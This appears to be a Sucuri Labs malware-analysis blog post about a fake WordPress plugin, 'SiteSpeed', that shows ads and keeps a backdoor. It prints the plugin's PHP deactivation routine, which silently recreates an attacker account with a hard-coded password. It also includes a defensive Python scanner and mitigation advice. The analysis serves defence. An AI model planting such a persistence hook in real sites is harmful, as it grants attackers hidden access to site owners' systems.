Fake WordPress Plugin SiteSpeed Serves Malicious Ads & Backdoors

July 16, 2020 by Krasimir Konov

Fake WordPress plugins appear to be trending as an effective way of establishing a foothold on compromised websites.

During a recent investigation, we discovered a fake component which was masquerading as a legitimate plugin. Named SiteSpeed, it contained a lot of interesting malicious capabilities.

Unwanted Advertisements

The malicious plugin can be used by the attacker to display ads on the website. To avoid detection and target specific website visitors, the plugin has many functions to check the user-agent, referrer, and the IP of the user accessing the page. If a search engine is detected, then the ads will not be displayed — only regular users will see the advertisements from the website pages.

Backdoor Functionality

One interesting technique that this plugin leverages is revealed upon deactivation. If a website administrator decides to deactivate SiteSpeed from the WordPress website, the fake component executes a couple of malicious tasks to maintain unauthorized access.

Let’s take a look at the contents of sitespeed.php to see how it accomplishes its backdoor functionality. We found this malicious file inside the plugin’s own directory, /wp-content/plugins/sitespeed/.

function sitespeed_deactivate() {
    global $wpdb;

    $charset_collate = $wpdb->get_charset_collate(); // unused in this routine

    // Drop the plugin's own two tables so little trace of it remains.
    $table_name = $wpdb->prefix . "sitespeed";
    $sql = "DROP TABLE $table_name";
    $wpdb->query( $sql );

    $table_name = $wpdb->prefix . "sitespeedban";
    $sql = "DROP TABLE $table_name";
    $wpdb->query( $sql );

    // Remove any existing "pedro68" account, reassigning its posts to user ID 1.
    $user_name = 'pedro68';
    $user_id = username_exists( $user_name );
    if ( $user_id ) {
        wp_delete_user($user_id, 1);
    }
    // Recreate the account with a fixed password and a randomized mailinator.com address.
    wp_create_user( $user_name, 'zhano', $user_name . rand(1,10000) . rand(1,10000) . '@mailinator.com' );

    delete_option( 'ads_enable' );
}

// Note: the guard tests for register_activation_hook() but registers a deactivation hook.
if(function_exists('register_activation_hook')) {
    register_deactivation_hook( __FILE__, 'sitespeed_deactivate' );
}

First, the code checks whether the username “pedro68” exists and, if so, removes it, reassigning all of that user’s posts to user_id = 1.

What this means is that, if malicious spam content has been injected by the attacker at any point post-compromise, those posts would remain on the website and appear under whichever user holds ID 1. Unless changed from the default, this is the ID typically associated with the initial administrative account, since IDs are assigned sequentially.

Role Creation

Another interesting piece of functionality is role creation. By leveraging the wp_create_user() function, the attackers create the user “pedro68” with the password “zhano” and a random email address containing digits:

wp_create_user( $user_name, 'zhano', $user_name . rand(1,10000) . rand(1,10000) . '@mailinator.com' );
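A defender-side triage check for the pattern described above: a small scanner (added here as an example; it is not Sucuri’s code) that locates each register_deactivation_hook() callback in a plugin’s PHP source and reports any user-creation or privilege-related calls inside it. The sample plugin sources are constructed inline from the snippet above and a benign deactivation routine; the function names and call list are the example’s own assumptions.

```python
"""Flag WordPress plugins whose deactivation hook creates users or changes privileges."""
import re

# Calls that have no legitimate business inside a plugin's deactivation routine.
# (Assumed watch-list for this example; extend as needed.)
SUSPICIOUS_CALLS = ("wp_create_user", "wp_insert_user", "set_role", "add_cap",
                    "eval", "base64_decode")

HOOK_RE = re.compile(r"register_deactivation_hook\s*\(\s*__FILE__\s*,\s*['\"](\w+)['\"]\s*\)")


def function_body(src, name):
    """Return the brace-delimited body of PHP function `name`, or None if not found."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:          # walk forward, balancing braces
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1] if depth == 0 else None


def scan_plugin(src):
    """Map each deactivation callback to the suspicious calls found in its body."""
    findings = {}
    for callback in HOOK_RE.findall(src):
        body = function_body(src, callback)
        if body is None:
            continue
        hits = [c for c in SUSPICIOUS_CALLS if re.search(r"\b" + c + r"\s*\(", body)]
        if hits:
            findings[callback] = hits
    return findings


# Constructed sample 1: the SiteSpeed deactivation routine quoted in this post.
SITESPEED_SRC = """<?php
function sitespeed_deactivate() {
    global $wpdb;
    $user_name = 'pedro68';
    $user_id = username_exists( $user_name );
    if ( $user_id ) { wp_delete_user($user_id, 1); }
    wp_create_user( $user_name, 'zhano', $user_name . rand(1,10000) . '@mailinator.com' );
}
if(function_exists('register_activation_hook')) {
    register_deactivation_hook( __FILE__, 'sitespeed_deactivate' );
}"""

# Constructed sample 2: a benign plugin that only flushes rewrite rules on deactivation.
BENIGN_SRC = """<?php
function myplugin_deactivate() { flush_rewrite_rules(); }
register_deactivation_hook( __FILE__, 'myplugin_deactivate' );"""
```

Run scan_plugin() over each file under wp-content/plugins; a non-empty result is a strong lead for manual review, while an empty one is not a clean bill of health since the scan is purely textual.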

Conclusion & Mitigation Steps

Hackers want to maintain unauthorized access for as long as possible, and they have a large number of tricks that they use to accomplish this.

Since malware can hide just about anywhere, it’s always worth checking your website’s plugins, existing users, theme files, or any other third-party extensible components for any indicators of compromise. You might just find an extra plugin that you don’t remember installing on your website which is acting as a backdoor.

Compromised websites can be used for a myriad of other malicious activities as well, ranging from DDoS and brute force attacks to spam mailings or malware distribution. Monitoring access to your WordPress website, unauthorized user creation, and changes to active plugins is a great way to mitigate risk and detect a compromise.

To prevent infection, consider using a web application firewall to restrict unauthorized access and mitigate risk to your website.


Categories: Sucuri Labs, Website Security, WordPress SecurityTags: Black Hat Tactics, Conditional Malware, Hacked Websites, Malvertising, WordPress Plugins and Themes

About Krasimir Konov

Krasimir Konov is Sucuri's Malware Analyst who joined the company in 2014. Krasimir's main responsibilities include analyzing malicious code, signature creation and documentation of malware. His professional experience covers more than 10 years in the IT field, with nine years involved in IT/cyber security. When he’s not analyzing malware or writing Labs notes, you might find Krasimir riding his motorcycle and traveling the world. Connect with him on Twitter or LinkedIn.
